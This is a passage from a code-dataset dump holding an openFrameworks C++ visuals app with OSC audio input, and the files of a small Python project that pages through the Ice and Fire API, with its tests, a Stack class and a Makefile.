fboParticles.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n \n //tweak\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n 0.05 * fw );\n }\n\n if(gUseCam)cam.begin();\n\n \n ofEnableDepthTest();\n ofEnableAlphaBlending();\n \n ///DRAW pair\n pair.drawScene();\n \n \n if(gUseCam)cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n ofDisableDepthTest();\n //----------------------------\n fboParticles.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboSphere(){\n \n fboSphere.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n \n ofEnableDepthTest();\n \n if(gUseLight){\n ofEnableLighting();\n light.enable();\n \n //tweak\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n gLightPos->z * fw );\n }\n\n cam.begin();\n \n ///drawSphere---------\n sphere.drawScene();\n ///---------\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n cam.end();\n \n ofDisableDepthTest();\n \n //----------------------------\n fboSphere.end();\n\n}\n#pragma mark - Updates\n//--------------------------------------------------------------\nvoid ofApp::updatePair(){\n \n int w = fw;\n \n guiPair.update();\n \n std::map<string, float> oscData;\n \n oscData[KEY_DIST_TRESHOLD] = guiPair.gDistTreshold;///osc\n oscData[KEY_PARTS_NUM] = guiPair.gPartsNum;\n oscData[KEY_X_VELOCITY] = guiPair.gXvelocity * w * 0.001;///osc\n //oscData[KEY_RADIUS_INIT] = guiPair.gRadiusInit;\n oscData[KEY_RADIUS_INIT] = 0.009 * w;\n oscData[KEY_RADIUS_VAR] = guiPair.gRadiusVar;///osc\n oscData[KEY_ANGLE_INIT] = guiPair.gAngleInit;\n oscData[KEY_ANGLE_VAR] = guiPair.gAngleVar;\n //nz\n oscData[KEY_ANGLE_NZ_AMP] = guiPair.gNzAngleAmp;\n oscData[KEY_ANGLE_NZ_FREQ] = guiPair.gNzAngleFreq;\n oscData[KEY_RADIUS_NZ_AMP] = 0.002 * w;\n oscData[KEY_RADIUS_NZ_FREQ]= guiPair.gNzRadFreq;\n oscData[KEY_X_NZ_AMP] = guiPair.gNzXposAmp;\n oscData[KEY_X_NZ_FREQ] = guiPair.gNzXposFreq;\n oscData[KEY_PART_SIZE] = w*0.001 * 8;\n oscData[KEY_PARTS_RATE] = 50;\n \n pair.setDistanceTreshold(guiPair.gDistTreshold);\n \n if(gReceiveOSC){\n oscData[KEY_PART_SIZE] = 20 * oscPartsValue1 * w*0.001;\n oscData[KEY_RADIUS_VAR] = 0.2*w * oscPartsValue2 * guiPair.gRadiusVar * 0.1;//specComp\n oscData[KEY_X_VELOCITY] = guiPair.gXvelocity * w * 0.001 + oscPartsValue3 * guiPair.gXvelocity * w * 0.0075;//inharm\n pair.setDistanceTreshold(0.07*w * oscPartsValue1 * 0.1 * guiPair.gDistTreshold);//power\n }\n\n std::map<string, float> pairData_A = oscData;\n std::map<string, float> pairData_B = oscData;\n \n pair.update(pairData_A, pairData_B);\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::updateSphere(){\n \n int w = fw;\n \n float x = sphere.xGui;\n float y = sphere.yGui;\n float vol = sphere.volumeGui;\n float rad = sphere.radiusGui;\n\n\n if(gReceiveOSC){\n //valores que cambian con osc son estos 4:\n rad = oscSphereValue3 * sphere.radiusGui;//specComp\n x = oscSphereValue2 * sphere.xGui ;//confidence\n y = .001 + oscSphereValue3 * sphere.yGui ;//specComp\n vol = 0.25 + oscSphereValue1 * sphere.volumeGui;//power\n \n }\n \n //sphere.dispNzAmnt = sphere.strengthGui;\n \n sphere.displacement.update(x, y, vol, rad, sphere.resolGui, ofGetFrameNum()*sphere.velGui);\n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::updateInstanced(){\n \n int w = fw;\n \n //update instancedManager values\n if(!instanced.gMode)instanced.setMode(LINEAL);\n else if(instanced.gMode && !instanced.gRadMode) instanced.setMode(RAD_CONCENTRIC);\n else if(instanced.gMode && instanced.gRadMode){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(instanced.gRadDeform);\n }\n \n instanced.setWidth(instanced.gWidth);\n instanced.setHeight(instanced.gHeight);\n instanced.setCubeSize(instanced.gCubesizeUnified * MAX_CUBESIZE*w);\n \n instanced.setMaskRadius(instanced.gMaskRadius);///osc\n \n instanced.setHres(instanced.gHres * MAX_H_RES);\n instanced.setVres(instanced.gVres * MAX_V_RES);\n \n instanced.setVelocity(instanced.gVelocity * MAX_VELOCITY);///osc\n \n instanced.setXpos(instanced.gXpos);\n instanced.setYpos(instanced.gYpos);\n instanced.setZpos(instanced.gZpos);\n //nz\n instanced.setNzTime(instanced.gNzTime * MAX_NZ_TIME);\n \n instanced.setXnzAmp(instanced.gNzXAmp * MAX_NZ_AMP*w);///osc\n instanced.setXnzFreq(instanced.gNzXFreq * MAX_NZ_FREQ);\n instanced.setXnzRug(instanced.gNzXRug * MAX_NZ_RUG*w);\n \n instanced.setYnzAmp(instanced.gNzYAmp * MAX_NZ_AMP*w);\n instanced.setYnzFreq(instanced.gNzYFreq * MAX_NZ_FREQ);\n instanced.setYnzRug(instanced.gNzYRug * MAX_NZ_RUG*w);\n \n instanced.setZnzAmp(instanced.gNzZAmp * MAX_NZ_AMP*w);///osc\n instanced.setZnzFreq(instanced.gNzZFreq * MAX_NZ_FREQ);\n instanced.setZnzRug(instanced.gNzZRug * MAX_NZ_RUG*w);\n \n if(gReceiveOSC){\n \n instanced.setZnzAmp(oscInstValue2 * MAX_NZ_AMP*w * instanced.gNzZAmp*10);//inharm\n instanced.setMaskRadius(0.5 - oscInstValue1*0.5);//power\n \n }\n\n\n}\n//--------------------------------------------------------------\nvoid ofApp::receiveOsc(){\n \n \n // check for waiting messages\n while(receiver.hasWaitingMessages()){\n // get the next message\n ofxOscMessage m;\n receiver.getNextMessage(&m);\n \n \n //sphere\n if(m.getAddress()==\"/ch0\"){\n\n oscSphereValue1 = m.getArgAsFloat(0);//power\n oscSphereValue2 = m.getArgAsFloat(2);//confidence\n oscSphereValue3 = m.getArgAsFloat(6);//spec-comp\n }\n //partSystem\n else if(m.getAddress()==\"/ch1\"){\n oscPartsValue1 = m.getArgAsFloat(0);//power\n oscPartsValue2 = m.getArgAsFloat(6);//specComp\n oscPartsValue3 = m.getArgAsFloat(7);//inharm\n \n }\n //instanced\n else if(m.getAddress()==\"/ch2\"){\n oscInstValue1 = m.getArgAsFloat(0);//power\n oscInstValue2 = m.getArgAsFloat(6);//specComp\n }\n\n \n }\n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::updateOscFromDataFile(int frameNum){\n \n \n \n string frameNumStr = ofToString(frameNum);\n \n oscSphereValue1 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:POWER\",0.0);\n oscSphereValue2 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:PITCHCONF\", 0.0);\n oscSphereValue3 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:SPECCOMP\", 0.0);\n \n oscPartsValue1 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-1:POWER\",0.0);\n oscPartsValue2 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-1:SPECCOMP\", 0.0);\n oscPartsValue3 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-1:INHARM\", 0.0);\n \n \n oscInstValue1 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-2:POWER\",0.0);\n oscInstValue2= data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-2:SPECCOMP\", 0.0);\n \n \n}\n\n#pragma mark - Other funcs\n//--------------------------------------------------------------\nvoid ofApp::setupGui(){\n \n //-----------------------------------\n guiMain.setup(\"Main Panel\");\n guiMain.setPosition(0, 0);\n guiMain.add(gDoPostProcessing.setup(\"Post-Proc\", true));\n guiMain.add(gReceiveOSC.setup(\"Receive Osc\", true));\n guiMain.add(gDoDrawInstanced.setup(\"Draw Inst\", true));\n guiMain.add(gDoDrawSphere.setup(\"Draw Sphere\", true));\n guiMain.add(gDoDrawParts.setup(\"Draw Parts\", true));\n guiMain.add(gDoDrawDomeLimits.setup(\"Draw Dome Lim\", false));\n guiMain.add(gLightPos.setup(\"LighPos\", ofVec3f(0.5, 0.5, 0.65), ofVec3f(0.0), ofVec3f(1.0)));\n guiMain.add(gUseCam.setup(\"useCam\", true));\n guiMain.add(gAxis.setup(\"axis\", true));\n guiMain.add(gUseLight.setup(\"useLight\", true));\n guiMain.add(gFisheye.setup(\"fisheye\", 0.6, 0.0, 1.0));\n guiMain.add(gFramePlayer.setup(\"frames\", 3481, 0, 4836));\n \n\n \n //--------------------------\n guiPair.setup();\n guiPair.gui.setPosition(200, 0);\n\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::resetCamera(){\n \n cam.setPosition(ofVec3f(fw*0.5, fh*0.5, 500.0));\n cam.lookAt(ofVec3f( fw*0.5, fh*0.5, 0.0));\n cam.setTarget(ofVec3f( fw*0.5, fh*0.5, 0.0));\n\n}\n//--------------------------------------------------------------\nvoid ofApp::triggerOnset(){\n \n pair.addPartGroup(1);\n pair.addPartGroup(2);\n\n}\n\n#pragma mark - Animation\n\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n isAnimating=true;\n ofLogNotice(\"Animation STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n frameCounter = _startingFrameNum;\n lastFrameWithOnset = 0;\n isAnimating = false;\n ofLogNotice(\"Animation STOPED\");\n}\n\n" }, { "alpha_fraction": 0.7808219194412231, "alphanum_fraction": 0.7853881120681763, "avg_line_length": 42.79999923706055, "blob_id": "8de779e5c57d73316807a440ef080fee6e34db6a", "content_id": "98f8d7a741ef0230c3c5697a8dc6d0f9f3cf4d1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 438, "license_type": "no_license", "max_line_length": 229, "num_lines": 10, "path": "/Graphics/examples/ofxFisheyeExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# ofxFisheye\t\n\n### Description\nExample app of the ofxFisheye addon. It applies different types of Fisheye Lens filters to an image using GLSL shaders.\n\n### Dependencies\n* addons: ofxFisheye.\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/)\n" } ]
62
eepgwde/blkswn
https://github.com/eepgwde/blkswn
4a533a46585db5c518c8b5573c16b3b9c759c4eb
f7677273b18f7607fe37e4a1feaf3ed3ae9c7373
01d7a40e406b7064687146fa90bf394d71a938bc
refs/heads/master
2020-05-25T21:28:12.061153
2019-05-18T13:49:46
2019-05-18T13:49:46
187,999,201
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5387936234474182, "alphanum_fraction": 0.5643271207809448, "avg_line_length": 27.639575958251953, "blob_id": "7c0a2f0815db3e3cbb74019edb00482b205eefb0", "content_id": "a145518281dff608fe08428eccfeead67622ce95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8115, "license_type": "no_license", "max_line_length": 96, "num_lines": 283, "path": "/tests/test_Test3.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test3.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test of IceFireA\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nimport itertools\nfrom functools import partial\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\nfrom blkswn import IceFireR\nfrom blkswn import IceFireA\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test3(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n return\n chs = IceFireR(config = Configuration.instance().config,\n type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n\n v0 = next(chs)\n self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n v0 = next(chs)\n self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n\n def test_001(self):\n q0 = ['a','b','c']\n\n x = 'b'\n v0 = IceFireA.first_true(q0, default=x)\n self.logger.info(\"first_true: {0}\".format(v0))\n self.assertTrue(v0 == q0[0])\n\n fpred = lambda x: x == 'b'\n\n x = '0'\n v0 = IceFireA.first_true(q0, default=x, pred=fpred)\n self.logger.info(\"first_true: {0}\".format(v0))\n self.assertTrue(v0 == 'b')\n\n fpred = lambda x: x == 'x'\n\n v0 = IceFireA.first_true(q0, default=x, pred=fpred)\n self.logger.info(\"first_true: {0}\".format(v0))\n self.assertTrue(v0 == x)\n\n def test_002(self):\n \"\"\"\n Basic loading from file for testing.\n \"\"\"\n books = IceFireA(type0=\"books\", file=\"books.txt\")\n self.assertIsNotNone(books)\n self.ar = books\n\n def test_004(self):\n \"\"\"\n Counting\n \"\"\"\n self.test_002()\n l0 = self.ar._src\n self.logger.info(type(l0))\n l1 = list(l0)\n self.logger.info(\"004: count: {cnt}\".format(cnt=len(l1)) )\n\n pass\n\n def make0(self):\n ts = IceFire.types0\n ts = \", \".join(ts)\n self.logger.info(\"006: {ts}\".format(ts=ts))\n\n self.srcs = ( ( \"{x}\".format(x=x), \"{x}.txt\".format(x=x) ) for x in IceFire.types0 )\n\n self.srcs = list(self.srcs) \n self.logger.info(self.srcs)\n\n fctr = lambda x: IceFireA(type0=x[0], file=x[1])\n v0 = fctr(self.srcs[0])\n self.logger.info(type(v0))\n\n # check one\n self.srcs0 = ( fctr(x) for x in self.srcs )\n v0 = next(self.srcs0)\n self.logger.info(type(v0))\n\n # now all\n self.srcs0 = list( fctr(x) for x in self.srcs )\n\n def test_006(self):\n \"\"\"\n Other checks\n \"\"\"\n self.make0()\n srcs0 = ( list(x._src) for x in self.srcs0 )\n cnts = ( len(x) for x in srcs0 )\n\n self.logger.info(\", \".join((str(x) for x in cnts)) )\n\n def test_008(self):\n self.make0()\n v0 = list((x._type0, x) for x in self.srcs0)\n self.logger.info(type(v0[0]))\n d0 = dict(v0)\n self.logger.info(d0.keys())\n\n ## Books from API\n b0 = list(d0['books']._src)\n self.logger.info(\"c). books from API: {0}\".format(len(b0)))\n\n def test_010(self):\n d0 = IceFireA.make0()\n self.logger.info(\"factory: {0}\".format(d0.keys()))\n\n h0 = d0['houses']._src # as an iterable\n walk, walk2 = itertools.tee(h0)\n\n # check it can work\n v0 = IceFireA.first_true(walk, default='null')\n self.logger.info(v0['url'])\n\n fpred = lambda x: x['name'].find(\"Breakstone\") > -1\n v0 = IceFireA.first_true(walk2, default='null', pred=fpred)\n self.logger.info(v0['url'])\n\n self.logger.info(\"a). House Breakstone is at {0}\".format(v0['url']))\n\n ## b). How many males, females and unknown genders are there in the first\n ## 40 characters? Note, index 0 does not correspond to a character, so\n ## full range is 1 - 40 both ends inclusive.\n\n c0 = d0['characters']._src # as an iterable\n\n c1 = itertools.islice(c0, 40)\n walk, walk2 = itertools.tee(c1)\n self.logger.info(type(walk))\n self.logger.info(len(list(walk)))\n\n gndrs = list((x['gender'] for x in walk2))\n self.logger.info(\"gndrs {0} {1}\".format(len(gndrs), gndrs))\n gtypes = set(gndrs)\n self.logger.info(gtypes)\n\n ## lambda functions don't work, try partials\n def snap0(x, tag=\"\"):\n return x == tag\n\n tag0 = list(gtypes)[0]\n snap1 = partial(snap0, tag=tag0)\n v0 = snap1(gndrs[0])\n self.logger.info(\"snap1: {} {}\".format(v0, tag0))\n\n ## List of partials\n\n fpreds = ( partial(snap0, tag=x) for x in gtypes )\n fpreds = list(fpreds)\n\n cnts = list( ( sum(map(fx, gndrs)) for fx in fpreds ))\n self.logger.info(cnts)\n self.logger.info(\"b). first 40 gender distribution {} \".format(list(zip(gtypes, cnts))))\n\n ## d) How many books does the character ‘High Septon’ appear in?\n ## (ignoring ‘povcharacters’)\n\n d0 = IceFireA.make0()\n c0 = d0['characters']._src # as an iterable\n\n walk, walk2 = itertools.tee(c0)\n\n fpred = lambda x: x['name'].find(\"High Septon\") > -1\n ckey0 = IceFireA.first_true(walk, default={ 'url': 'null' }, pred=fpred)\n self.logger.info(ckey0['url'])\n\n ## to match the url of a character in books.characters\n tag0 = ckey0['url']\n snap1 = partial(snap0, tag=tag0)\n\n b0 = d0['books']._src # as an iterable\n walk, walk2 = itertools.tee(b0)\n\n bc = dict(((x['name'], x['characters']) for x in walk2))\n self.logger.info(len(bc.keys()))\n self.logger.info(bc.keys())\n\n x00 = list(bc.values())\n x1 = x00[0]\n self.logger.info(x1)\n \n v0 = ( IceFireA.first_true(x, default='', pred=snap1) for x in x00 )\n v0 = list(v0)\n self.logger.info(v0)\n\n ## if length is greater than 0 is the URL of ckey0\n def snap2(x):\n return int(len(x) > 0)\n\n # finally, apply snap2 and sum \n nckey0 = sum(map(snap2, v0))\n\n self.logger.info(\"d). {0} books have character High Septon {1}\"\n .format(nckey0, ckey0['url']))\n\n pass\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.5686777830123901, "alphanum_fraction": 0.5712451934814453, "avg_line_length": 20.63888931274414, "blob_id": "6c36e3dd08b4358811229719ec9422a90eaa5e8f", "content_id": "996ba7347c1beb85d5f629015c630260182b8913", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 779, "license_type": "no_license", "max_line_length": 80, "num_lines": 36, "path": "/blkswn/_Stack.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @author weaves\n##\n## \n\nclass Stack:\n \"\"\"\n Stack implementation using native list.\n \"\"\"\n\n def __init__(self):\n self.elements = []\n\n def push(self, item):\n self.elements.append(item)\n\n def pop(self):\n \"\"\"\n Return the stored reference to top element and remove it from the stack.\n\n This does not trap exceptions. Use is_empty() prior to invoking this.\n \"\"\"\n return self.elements.pop()\n\n def peek(self):\n \"\"\"\n Return the stored reference and do not remove it.\n\n This does not trap exceptions. Use is_empty() prior to invoking this.\n \"\"\"\n return self.elements[-1]\n\n def size(self):\n return len(self.elements)\n\n def is_empty(self):\n return self.size() == 0\n" }, { "alpha_fraction": 0.5986519455909729, "alphanum_fraction": 0.6029411554336548, "avg_line_length": 18.650602340698242, "blob_id": "6eb178fdbae485a47061e7fa94f522684deb527c", "content_id": "d0e0c7f8cca63b2cc7b0285a3c566d96b92d54e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 67, "num_lines": 83, "path": "/Makefile", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## weaves\n# Generic test makefile for Python\n\nPKG := $(notdir $(PWD))\n\nPYTHON ?= python3\nPIP ?= pip3\nUUT ?= \nX_LOGFILE ?= test.log\nSDIR ?= tests/media\nPYTHONIOENCODING=utf-8\n\nPROG0 ?= $(HOME)/.local/bin/$(PKG)\nPROG0_FLAGS ?= $(HOME)/.local/bin/$(PKG)\n\nSRCS ?= $(wildcard $(PKG)/*.py) $(wildcard tests/*.py)\n\nexport SDIR\nexport X_LOGFILE\n\nall::\n\ttrue\n\nall-local: data/v0.json\n\ndata/v0.json: bak/blkswn.json\n\tpython -mjson.tool < $< > $@\n\n#\tsed -e 's/ false,/ False,/g' -e 's/ true,/ True,/g' < $< > $@\n\ncheck:: contrib/$(X_LOGFILE)\n\ncontrib/$(X_LOGFILE): $(X_LOGFILE)\n\ttest -d contrib || mkdir -p contrib \n\tcp $< $@\n\nifneq ($(UUT),)\n\n$(X_LOGFILE): $(SRCS)\n\t:> $@\n\t$(PYTHON) -m unittest -v tests.$(UUT)\n\ttest -d contrib || mkdir contrib\n\nelse\n\n$(X_LOGFILE): $(SRCS)\n\t:> $@\n\t$(PYTHON) -m unittest discover -v -s tests\n\nendif \n\nclean::\n\t$(RM) $(wildcard *.pyc *.log *~ nohup.out contrib/*.log)\n\ndistclean::\n\t$(RM) -rf html\n\t$(RM) $(wildcard *.json)\n\n## Install\n\n.PHONY: uninstall dist-local distinstall check-tool\n\nuninstall::\n\trm -f $(wildcard dist/*.tar.gz)\n\t-$(SHELL) -c \"cd $(HOME)/.local; $(PIP) uninstall --yes $(PKG)\"\n\ndist-local:\n\tcp $(wildcard tests/test_*.py) contrib\n\t$(PYTHON) setup.py sdist\n\ndistinstall: uninstall dist-local\n\t$(PIP) install --user $(wildcard dist/*.tar.gz)\n\ninstall: uninstall \n\t$(PIP) install --user -e .\n\nclean::\n\t-$(SHELL) -c \"find . -type d -name __pycache__ -exec rm -rf {} \\;\"\n\t-$(SHELL) -c \"find . -type f -name '*.log' -delete \"\n\t-$(SHELL) -c \"find . -type f -name '*~' -delete \"\n\t-$(SHELL) -c \"find . -type d -name '*egg*' -exec rm -rf {} \\; \"\n\trm -f $(wildcard dist/*)\n\trm -f ChangeLog AUTHORS\n\n" }, { "alpha_fraction": 0.5719547271728516, "alphanum_fraction": 0.5856353640556335, "avg_line_length": 25.943262100219727, "blob_id": "a58b8130ab034b84c92481a4cc3707354840a568", "content_id": "ddf0390742ba602b6abb586afcc1a9b76e28eaa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3801, "license_type": "no_license", "max_line_length": 92, "num_lines": 141, "path": "/tests/test_Test2.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test2.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test.\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFireR\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test2(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n\n v0 = next(chs)\n self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n v0 = next(chs)\n self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n\n def test_002(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n houses = [ x for x in ichs ]\n\n self.assertIsNotNone(houses)\n self.assertTrue(len(houses) > 0)\n\n with open('books.txt', 'w') as f0:\n f0.write(str(houses))\n\n def test_004(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='houses',\n logger=self.logger)\n\n ichs = iter(chs)\n houses = [ x for x in ichs ]\n\n self.assertIsNotNone(houses)\n self.assertTrue(len(houses) > 0)\n\n with open('houses.txt', 'w') as f0:\n f0.write(str(houses))\n\n def test_006(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='characters',\n logger=self.logger)\n\n ichs = iter(chs)\n houses = [ x for x in ichs ]\n\n self.assertIsNotNone(houses)\n self.assertTrue(len(houses) > 0)\n\n with open('characters.txt', 'w') as f0:\n f0.write(str(houses))\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.7329843044281006, "alphanum_fraction": 0.7473822236061096, "avg_line_length": 20.828571319580078, "blob_id": "0992ee02033cfd5b7c7f6ff625eb0d452013ea23", "content_id": "c0b24b39c925bc565903b934a67c556fb48d5f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 764, "license_type": "no_license", "max_line_length": 72, "num_lines": 35, "path": "/README.rst", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "weaves\n\nFor Fractal Labs\n\nThis is a Stack using a list see _Stack.py\n\nAnd a Queue that using two Stack objects. This latter structure uses\na Towers of Hanoi rebuild when there is a dequeue()\n\nIt has these extra features:\n\nI've implemented push and pop to enqueue and dequeue\npeek() is the first of the stack_1\n\nI've forced an error on dequeue to make the test code for the Queue (see\ntest_Test1) identical to the test code for Stack, see test_Test.\n\nIn pseudo-code\n\nEnqueue:\npush passed element onto stack_1.\n\nDequeue:\nif empty(stack_1) throw index error \nwhile (!empty(stack_1))\n element = pop from stack_1\n push element onto stack_2\n\nresult = pop from stack2\n\nwhile (!empty(stack_1))\n element = pop from stack_2\n push element into stack_1\n\nreturn result\n" }, { "alpha_fraction": 0.6297494173049927, "alphanum_fraction": 0.6418755054473877, "avg_line_length": 19.600000381469727, "blob_id": "f07948581561c481b94a1b07d9082bc3dc90bdc4", "content_id": "0144c59a396043e129bd57c89e901f7c05ae7a81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1237, "license_type": "no_license", "max_line_length": 82, "num_lines": 60, "path": "/blkswn/_IceFireR.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _IceFireR.py\n# @brief Iterator that pages through the records in the pages\n# @author weaves\n#\n# @details\n# For a typical iterator interface this pages and records one record at a time.\n#\n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\n\nfrom functools import partial\n\nfrom blkswn import IceFire\nfrom blkswn import Configuration\n\nclass IceFireR(object):\n\n _ftchr = None\n _page = None\n\n def __init__(self, **kwargs):\n \"\"\"\n Set the type0 if given as a keyword.\n\n Set idx1 for use with index.\n\n Pass others to the parent URL fetch class.\n \"\"\"\n if 'type0' in kwargs:\n self.type0 = kwargs['type0']\n\n self._ftchr = iter(IceFire(**kwargs))\n\n def __iter__(self):\n return self\n\n def _page0(self):\n self._page = None\n v0 = next(self._ftchr)\n self._page = iter(list(v0)[0])\n\n # Python 3 compatibility\n def __next__(self):\n \"\"\"\n Iterate through the page captured as a list\n \"\"\"\n if self._page is None:\n self._page0()\n\n try:\n v0 = dict(next(self._page)) # end of local list\n except StopIteration:\n self._page0() # this will throw a StopIteration if no more pages\n v0 = next(self._page)\n\n return v0\n\n" }, { "alpha_fraction": 0.5566037893295288, "alphanum_fraction": 0.5801886916160583, "avg_line_length": 18.272727966308594, "blob_id": "4b56a181b84cf83573ebd7b02ff49cb88da6515f", "content_id": "4711212e2b3eee3b6cacaf260fbe802963a9c3ac", "detected_licenses": [], "is_generated": false, 